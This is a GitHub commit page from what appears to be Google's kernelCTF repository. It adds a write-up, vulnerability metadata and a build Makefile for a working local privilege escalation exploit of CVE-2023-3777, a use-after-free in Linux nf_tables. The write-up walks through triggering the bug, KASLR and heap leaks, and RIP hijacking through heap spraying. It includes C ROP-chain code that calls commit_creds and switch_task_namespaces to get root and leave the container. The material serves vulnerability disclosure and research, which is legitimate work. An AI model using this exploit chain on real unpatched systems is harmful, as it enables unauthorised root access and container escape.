Add kernelCTF CVE-2023-3777 (lts) (#85)

* Add kernelCTF CVE-2023-3777 (lts) * Fix structure error * Fix structure error * Fix Makefile * update comments * update exploit.md
google · May 2, 2024 · 997724c · 997724c
1 parent 63bb5d1
commit 997724c
Show file tree

Hide file tree

Showing 8 changed files with 1,432 additions and 0 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2023-3777_lts/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-3777_lts/docs/exploit.md
@@ -0,0 +1,277 @@
+### Triggering Vulnerability
+
+In the `nf_tables_delrule`, if there is `NFTA_RULE_CHAIN`, the `nft_chain_is_bound` checks whether the chain is bound [1]. When `NFTA_RULE_CHAIN` is not given, all chain rules in the table are deleted. At this time, whether the chain is bound is not checked [2]. As a result, the bound chain is deleted twice. If nft_lookup or nft_immediate expr exists in the bound chain, the reference counter of the referenced object can be decreased twice. We can use this to create a dangling pointer, thus, a use-after-free is occured.
+
+```c
+static int nf_tables_delrule(struct sk_buff *skb, const struct nfnl_info *info,
+                 const struct nlattr * const nla[])
+{
+    ...
+
+    if (nla[NFTA_RULE_CHAIN]) {
+        chain = nft_chain_lookup(net, table, nla[NFTA_RULE_CHAIN],
+                     genmask);
+        if (IS_ERR(chain)) {
+            if (PTR_ERR(chain) == -ENOENT &&
+                NFNL_MSG_TYPE(info->nlh->nlmsg_type) == NFT_MSG_DESTROYRULE)
+                return 0;
+
+            NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
+            return PTR_ERR(chain);
+        }
+        if (nft_chain_is_bound(chain))  // [1]
+            return -EOPNOTSUPP;
+    }
+
+    nft_ctx_init(&ctx, net, skb, info->nlh, family, table, chain, nla);
+
+    if (chain) {
+        if (nla[NFTA_RULE_HANDLE]) {
+            rule = nft_rule_lookup(chain, nla[NFTA_RULE_HANDLE]);
+            if (IS_ERR(rule)) {
+                if (PTR_ERR(rule) == -ENOENT &&
+                    NFNL_MSG_TYPE(info->nlh->nlmsg_type) == NFT_MSG_DESTROYRULE)
+                    return 0;
+
+                NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
+                return PTR_ERR(rule);
+            }
+
+            err = nft_delrule(&ctx, rule);
+        } else if (nla[NFTA_RULE_ID]) {
+            rule = nft_rule_lookup_byid(net, chain, nla[NFTA_RULE_ID]);
+            if (IS_ERR(rule)) {
+                NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_ID]);
+                return PTR_ERR(rule);
+            }
+
+            err = nft_delrule(&ctx, rule);
+        } else {
+            err = nft_delrule_by_chain(&ctx);
+        }
+    } else {
+        list_for_each_entry(chain, &table->chains, list) {  // [2]
+            if (!nft_is_active_next(net, chain))
+                continue;
+
+            ctx.chain = chain;
+            err = nft_delrule_by_chain(&ctx);
+            if (err < 0)
+                break;
+        }
+    }
+
+    return err;
+}
+```
+
+### KASLR Bypass
+
+The KASLR address is leaked through `chain->name`, which is stored in the verdict data of the immediate expr (`nft_immediate_expr.data.verdict`). The leak process is as follows:
+
+- Create three chains, `Base`, `Vulnerable`, and `Victim`. Set `NFT_CHAIN_BINDING` flag for `Vulnerable`.
+- Create a rule in `Base` with an immediate expr referencing the `Vulnerable`.
+- Create a rule in `Vulnerable` with an immediate expr referencing `Victim`.
+- Trigger the vulnerability by flushing the rule in `Vulnerable`. This results in the `Victim` having a reference count of -1.
+- Create an immediate expr in `Base` that references to the Victim, making the `Victim`'s reference count 0, and destroy the `Victim`.
+- Spray counter exprs (struct nft_expr) to place it at `Victim`'s chain->name. At this time, the counter exprs are allocated in the `kmalloc-cg-16`.
+- We dump the immediate expr of `Base` using `GETRULE` command, we can get the ops address of counter expr through the freed `chain->name` to get the kernel base address [3].
+
+```c
+int nft_verdict_dump(struct sk_buff *skb, int type, const struct nft_verdict *v)
+{
+    struct nlattr *nest;
+
+    nest = nla_nest_start_noflag(skb, type);
+    if (!nest)
+        goto nla_put_failure;
+
+    if (nla_put_be32(skb, NFTA_VERDICT_CODE, htonl(v->code)))
+        goto nla_put_failure;
+
+    switch (v->code) {
+    case NFT_JUMP:
+    case NFT_GOTO:
+        if (nla_put_string(skb, NFTA_VERDICT_CHAIN,
+                    v->chain->name))  // [3]
+            goto nla_put_failure;
+    }
+    nla_nest_end(skb, nest);
+    return 0;
+
+nla_put_failure:
+    return -1;
+}
+```
+
+### Heap Address Leak
+
+We leak the heap address in the same way as we leak the kernel base address. To leak the heap address, we sprayed the `nft_rule` instead of counter expr. We place `nft_rule` in freed `nft_chain->name` and dump the rule of the `Base`. As a result, we can read the heap address stored in `nft_rule->list` through `nft_chain->name`. We put the address of the `kmalloc-cg-96` object in `list->next` and the address of the `kmalloc-cg-192` object in `list->prev`, and we leaked both addresses. Since data of type string is used for leaking, we repeated until the heap address does not contain null.
+
+### RIP Control
+
+We use `nft_chain->blob_gen_0` to control the RIP. The `nft_chain->blob_gen_0` is used when evaluating packets in the `nft_do_chain` function [4].
+
+```c
+nft_do_chain(struct nft_pktinfo *pkt, void *priv)
+{
+    ...
+do_chain:
+    if (genbit)
+        blob = rcu_dereference(chain->blob_gen_1);
+    else
+        blob = rcu_dereference(chain->blob_gen_0);  // [4]
+
+    rule = (struct nft_rule_dp *)blob->data;
+    last_rule = (void *)blob->data + blob->size;
+next_rule:
+    regs.verdict.code = NFT_CONTINUE;
+    for (; rule < last_rule; rule = nft_rule_next(rule)) {
+        nft_rule_dp_for_each_expr(expr, last, rule) {
+            if (expr->ops == &nft_cmp_fast_ops)
+                nft_cmp_fast_eval(expr, &regs);
+            else if (expr->ops == &nft_cmp16_fast_ops)
+                nft_cmp16_fast_eval(expr, &regs);
+            else if (expr->ops == &nft_bitwise_fast_ops)
+                nft_bitwise_fast_eval(expr, &regs);
+            else if (expr->ops != &nft_payload_fast_ops ||
+                    !nft_payload_fast_eval(expr, &regs, pkt))
+                expr_call_ops_eval(expr, &regs, pkt);
+
+            if (regs.verdict.code != NFT_CONTINUE)
+                break;
+        }
+    ...
+```
+
+To do this, we assign `chain->blob_gen_0` to `kmalloc-cg-64` and trigger the vulnerability. `chain->blob_gen_0` is allocated in the `nf_tables_chain_alloc_rules` when creating new chain [5]. `chain->blob_gen_0` is allocated from the `nf_tables_chain_alloc_rules` when creating a new chain [5].
+
+```c
+static int nf_tables_addchain(struct nft_ctx *ctx, u8 family, u8 genmask,
+			      u8 policy, u32 flags,
+			      struct netlink_ext_ack *extack)
+{
+    ...
+	data_size = offsetof(struct nft_rule_dp, data);	/* last rule */
+	blob = nf_tables_chain_alloc_rules(data_size);      // [5]
+	if (!blob) {
+		err = -ENOMEM;
+		goto err_destroy_chain;
+	}
+```
+
+The size used by `kvmalloc` [6] is 40, `offsetof(struct nft_rule_dp, data)` + `sizeof(struct nft_rule_blob)` + `sizeof(struct nft_rules_old)` (8 + 24 + 8), the `blob` object is allocated in `kmalloc-cg-64`.
+
+```c
+static struct nft_rule_blob *nf_tables_chain_alloc_rules(unsigned int size)
+{
+	struct nft_rule_blob *blob;
+
+	/* size must include room for the last rule */
+	if (size < offsetof(struct nft_rule_dp, data))
+		return NULL;
+
+	size += sizeof(struct nft_rule_blob) + sizeof(struct nft_rules_old);
+	if (size > INT_MAX)
+		return NULL;
+
+	blob = kvmalloc(size, GFP_KERNEL_ACCOUNT);      // [6]
+	if (!blob)
+		return NULL;
+
+	blob->size = 0;
+	nft_last_rule(blob, blob->data);
+
+	return blob;
+}
+```
+
+We then spray the `udata` of the `struct nft_table` and place it in freed `blob_gen_0`. Finally, when a packet is sent, a sprayed fake ops address is referenced, resulting in RIP control [7].
+
+```c
+static void expr_call_ops_eval(const struct nft_expr *expr,
+                    struct nft_regs *regs,
+                    struct nft_pktinfo *pkt)
+{
+#ifdef CONFIG_RETPOLINE
+    unsigned long e = (unsigned long)expr->ops->eval;
+#define X(e, fun) \
+    do { if ((e) == (unsigned long)(fun)) \
+        return fun(expr, regs, pkt); } while (0)  // [7]
+
+    X(e, nft_payload_eval);
+    X(e, nft_cmp_eval);
+    X(e, nft_counter_eval);
+    X(e, nft_meta_get_eval);
+    X(e, nft_lookup_eval);
+    X(e, nft_range_eval);
+    X(e, nft_immediate_eval);
+    X(e, nft_byteorder_eval);
+    X(e, nft_dynset_eval);
+    X(e, nft_rt_get_eval);
+    X(e, nft_bitwise_eval);
+#undef  X
+#endif /* CONFIG_RETPOLINE */
+    expr->ops->eval(expr, regs, pkt);
+}
+```
+
+### Post RIP
+
+Store the ROP payload below to the `kmalloc-cg-96` and `kmalloc-cg-192` addresses leaked above, and execute it.
+
+```c
+void make_payload(uint64_t* data){
+    int i = 0;
+
+    data[i++] = kbase + push_rbx_pop_rsp;
+
+    // commit_creds(&init_cred)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = kbase + init_cred_off;
+    data[i++] = kbase + commit_creds_off;
+
+    // current = find_task_by_vpid(getpid())
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = getpid();
+    data[i++] = kbase + find_task_by_vpid_off;
+
+    // current += offsetof(struct task_struct, rcu_read_lock_nesting)
+    data[i++] = kbase + pop_rsi_ret;
+    data[i++] = 0x474;
+    data[i++] = kbase + add_rax_rsi_ret;
+
+    data[i++] = kbase + pop_rsp_ret;
+    data[i++] = heap_addr1+0x20;
+}
+
+void make_payload2(uint64_t* data){
+    int i = 0;
+
+    // current->rcu_read_lock_nesting = 0 (Bypass rcu protected section)
+    data[i++] = kbase + pop_rcx_ret;
+    data[i++] = -0xffff;
+    data[i++] = kbase + mov_rax_rcx_ret;
+
+    // find_task_by_vpid(1)
+    data[i++] = kbase + pop_rdi_ret;
+    data[i++] = 1;
+    data[i++] = kbase + find_task_by_vpid_off;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + mov_rdi_rax_ret;
+    data[i++] = kbase + pop_rsi_ret;
+    data[i++] = kbase + init_nsproxy_off;
+    data[i++] = kbase + switch_task_namespaces_off;
+
+    // switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
+    data[i++] = kbase + swapgs_restore_regs_and_return_to_usermode_off;
+    data[i++] = 0;                  // rax
+    data[i++] = 0;                  // rdx
+    data[i++] = _user_rip;          // user_rip
+    data[i++] = _user_cs;           // user_cs
+    data[i++] = _user_rflags;       // user_rflags
+    data[i++] = _user_sp;           // user_sp
+    data[i++] = _user_ss;           // user_ss
+}
+```
diff --git a/pocs/linux/kernelctf/CVE-2023-3777_lts/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-3777_lts/docs/vulnerability.md
@@ -0,0 +1,12 @@
+- Requirements:
+    - Capabilites: CAP_NET_ADMIN
+    - Kernel configuration: CONFIG_NETFILTER=y, CONFIG_NF_TABLES=y
+    - User namespaces required: Yes
+- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d0e2c7de92c7
+- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6eaf41e87a223ae6f8e7a28d6e78384ad7e407f8
+- Affected Version: v5.9-rc1 - v6.5-rc2
+- Affected Component: net/netfilter
+- Syscall to disable: disallow unprivileged username space
+- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-3777
+- Cause: Use-After-Free
+- Description: A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation. When nf_tables_delrule() is flushing table rules, it is not checked whether the chain is bound and the chain's owner rule can also release the objects in certain circumstances. We recommend upgrading past commit 6eaf41e87a223ae6f8e7a28d6e78384ad7e407f8.
diff --git a/pocs/linux/kernelctf/CVE-2023-3777_lts/exploit/lts-6.1.36/Makefile b/pocs/linux/kernelctf/CVE-2023-3777_lts/exploit/lts-6.1.36/Makefile
@@ -0,0 +1,39 @@
+LIBMNL_DIR = $(realpath ./)/libmnl_build
+LIBNFTNL_DIR = $(realpath ./)/libnftnl_build
+
+LIBS = -L$(LIBNFTNL_DIR)/install/lib -L$(LIBMNL_DIR)/install/lib -lnftnl -lmnl
+INCLUDES = -I$(LIBNFTNL_DIR)/libnftnl-1.2.5/include -I$(LIBMNL_DIR)/libmnl-1.0.5/include
+CFLAGS = -static -s
+
+exploit:
+	gcc -o exploit exploit.c $(LIBS) $(INCLUDES) $(CFLAGS)
+
+prerequisites: libnftnl-build
+
+libmnl-build : libmnl-download
+	tar -C $(LIBMNL_DIR) -xvf $(LIBMNL_DIR)/libmnl-1.0.5.tar.bz2
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && ./configure --enable-static --prefix=`realpath ../install`
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make -j`nproc`
+	cd $(LIBMNL_DIR)/libmnl-1.0.5 && make install
+
+libnftnl-build : libmnl-build libnftnl-download
+	tar -C $(LIBNFTNL_DIR) -xvf $(LIBNFTNL_DIR)/libnftnl-1.2.5.tar.xz
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && PKG_CONFIG_PATH=$(LIBMNL_DIR)/install/lib/pkgconfig ./configure --enable-static --prefix=`realpath ../install`
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && C_INCLUDE_PATH=$(C_INCLUDE_PATH):$(LIBMNL_DIR)/install/include LD_LIBRARY_PATH=$(LD_LIBRARY_PATH):$(LIBMNL_DIR)/install/lib make -j`nproc`
+	cd $(LIBNFTNL_DIR)/libnftnl-1.2.5 && make install
+
+libmnl-download :
+	mkdir $(LIBMNL_DIR)
+	wget -P $(LIBMNL_DIR) https://netfilter.org/projects/libmnl/files/libmnl-1.0.5.tar.bz2
+
+libnftnl-download :
+	mkdir $(LIBNFTNL_DIR)
+	wget -P $(LIBNFTNL_DIR) https://netfilter.org/projects/libnftnl/files/libnftnl-1.2.5.tar.xz
+
+run:
+	./exploit
+
+clean:
+	rm -f exploit
+	rm -rf $(LIBMNL_DIR)
+	rm -rf $(LIBNFTNL_DIR)
diff --git a/pocs/linux/kernelctf/CVE-2023-3777_lts/exploit/lts-6.1.36/exploit b/pocs/linux/kernelctf/CVE-2023-3777_lts/exploit/lts-6.1.36/exploit